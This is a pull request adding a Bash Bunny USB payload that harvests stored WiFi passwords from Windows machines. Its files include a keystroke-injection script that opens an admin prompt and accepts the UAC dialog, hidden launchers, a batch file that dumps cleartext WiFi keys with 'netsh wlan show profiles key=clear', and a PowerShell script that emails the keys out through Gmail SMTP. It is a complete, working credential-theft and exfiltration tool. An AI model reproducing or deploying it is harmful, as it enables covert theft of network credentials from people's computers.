### PR TITLE
Harvest WiFi Profile Keys (Passwords) From Target

### DIFF
--- a/WiFiPassword/README.md
+++ b/WiFiPassword/README.md
@@ -1,0 +1,46 @@
+# WiFi Profile Harvesting
+
+Author: punisherprime  
+Version: 1.0
+
+## Description
+
+Windows stores WiFi data in profiles on the system. Given physical access you can go in and harvest this information to include the key, or password, for any stored profiles.
+
+## Configuration
+
+Appears to work on Windows 10 and Windows 7 workstations.
+It turns out that Windows 7 needs an elevated command prompt to display the clear key or password.
+Because this uses a method similar to that described in Hak5 episodes 2112, 2113, and 2114 there are CAPSLOCK blinkie lights that show you the status.  You should see the status light on the BashBunny turn green, then the CAPSLOCK light on the system or keyboard flash three times followed seconds later (at most 30 seconds) by the flashing of the CAPSLOCK three times again.
+
+This payload includes an ability to save the data to your BashBunny and e-mail it off so you do not have to wait for those keys!
+
+payload.txt is the BashBunny script that gives you an administrative command prompt.
+
+d.cmd contains the start of the payload. It flashes the CAPSLOCK to let you know it is kicking off and then launches e.cmd using i.vbs. 
+
+e.cmd contains the commands that:
+     1. Creates folder structure on the BashBunny
+	 2. Grabs the WiFi Profiles from the target and saves it to the BashBunny
+	 3. Grabs the keys (passwords) and saves them to the BashBunny
+	 4. E-mails the SSIDs and keys out
+     Then it flashes the CAPSLOCK again for you so you know it is done.  
+	 
+Put e.cmd, d.cmd, payload.txt, and i.vbs into the SWITCH folder of your choice on the BashBunny.
+
+SendMail.ps1 goes in the LIBRARY folder on your BashBunny. I did this so that I could reuse the code between exploits. Someone smarter than me might figure out a way to do it in one line and put it into the batch file.  SendMail.ps1 is a powershell script that kicks out the e-mail from the e.cmd batch script. You will need to replace your e-mail address and password in the SendMail.ps1 script.  If you choose to use Gmail you will need to configure Gmail to allow unsecure connections.
+
+This payload assumes you have not changed the name of your BashBunny (it relies on the name during the execution). 
+
+
+## STATUS
+
+| LED              | Status                              |
+| ---------------- | ----------------------------------- |
+| RED              | The BashBunny is starting up        |
+| GREEN            | The BashBunny has sent the script   |
+
+| CAPSLOCK         | Status                              |
+| ---------------- | ----------------------------------- |
+| THREE BLINKS     | The payload has started.            |
+| THREE BLINKS     | The payload has ended.              |

--- a/WiFiPassword/SendMail.ps1
+++ b/WiFiPassword/SendMail.ps1
@@ -1,0 +1,11 @@
+$SMTPServer = 'smtp.gmail.com'
+$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
+$SMTPInfo.EnableSsl = $true
+$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('youremailhere@gmail.com', 'youremailpasswordhere')
+$ReportEmail = New-Object System.Net.Mail.MailMessage
+$ReportEmail.From = 'youremailhere@gmail.com'
+$ReportEmail.To.Add('youremailhere@gmail.com')
+$ReportEmail.Subject = 'WiFi Password'
+$ReportEmail.Body = (Get-Content mail.txt | out-string)
+$SMTPInfo.Send($ReportEmail)
+

--- a/WiFiPassword/d.cmd
+++ b/WiFiPassword/d.cmd
@@ -1,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit

--- a/WiFiPassword/e.cmd
+++ b/WiFiPassword/e.cmd
@@ -1,0 +1,36 @@
+@echo off
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+set dst=%~dp0\..\..\loot\WiFiProfiles\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+REM Set variable for the dynimic portions of the file, and include the file extension
+FOR %%A IN (%Date:/=%) DO SET Today=%%A
+REM Trim right white space, a maximum of 1 time (the final 1 in brackets represents max iterations)
+for /l %%a in (1,1,1) do if "!Today:~-1!"==" " set Today=!Today:~0,-1!
+SET dynpathname=%TODAY%_%COMPUTERNAME%_%USERNAME%.txt
+
+REM Grab stored wireless profiles
+REM Identify all of the SSID profiles on the system (netsh wlan show profiles will produce the available SSID profiles) and store them
+REM The SSID profiles might be valuable if you are wanting to do a wireless MitM
+set n=
+for /f "skip=6 tokens=5 delims= " %%n in ('netsh wlan show profiles') DO @echo %%n >>%dst%\WiFiProfiles__%DYNPATHNAME%
+REM Grab the stored wireless keys
+REM The "key=clear" portion will unmask the available WiFi key (if one exists for that SSID)
+set n=
+for /f "skip=6 tokens=5 delims= " %%n in ('netsh wlan show profiles') DO @netsh wlan show profiles %%n key=clear| findstr /c:"Name" /c:"Network type" /c:"Authentication" /c:"Key Content" >>%dst%\WiFiKeys_%DYNPATHNAME%
+
+REM e-mail out the Keys
+copy %dst%\WiFiKeys_%DYNPATHNAME% %~dp0\..\..\payloads\library\mail.txt
+for /f %%D in ('wmic volume get DriveLetter^, Label ^| find "BashBunny"') do %%D
+cd %~dp0\..\..\payloads\library\
+start /b /w powershell.exe -exec bypass -nologo -WindowStyle Hidden . .\SendMail.ps1
+del %dst%\WiFiKeys_%DYNPATHNAME% %~dp0\..\..\payloads\library\mail.txt
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit
+

--- a/WiFiPassword/i.vbs
+++ b/WiFiPassword/i.vbs
@@ -1,0 +1,1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False

--- a/WiFiPassword/payload.txt
+++ b/WiFiPassword/payload.txt
@@ -1,0 +1,30 @@
+#!/bin/bash
+#
+# Title:         WiFiPassword
+# Author:        T
+# Version:       1.0
+# Target:        Windows XP SP3+
+# Props:         Siem's WiFi password grabber duck script,@hak5darren for a a bunch of stuff,@BHinfoSecurity for making me realize I could pass the netsh commands into eachother like they do with net.exe to find domain passwords which also would probably totally work here if you could get the email script into the e.cmd file then walk away and wait for it to email you the user names and passwords
+# 
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn harvests the SSID and key content (password) for WiFi profiles.
+#
+
+# Source bunny_helpers.sh to get environment variable SWITCH_POSITION
+source bunny_helpers.sh
+
+LED R
+ATTACKMODE HID STORAGE
+REM open cmd as admin
+QUACK CONTROL ESCAPE
+QUACK DELAY 100
+QUACK STRING cmd.exe
+QUACK CTRL-SHIFT ENTER
+QUACK DELAY 1000
+QUACK ALT y
+QUACK ENTER
+QUACK DELAY 50
+QUACK STRING powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+QUACK ENTER
+LED G


### PR DESCRIPTION
Windows stores WiFi data in profiles on the system. Given physical access you can go in and harvest this information to include the key, or password, for any stored profiles.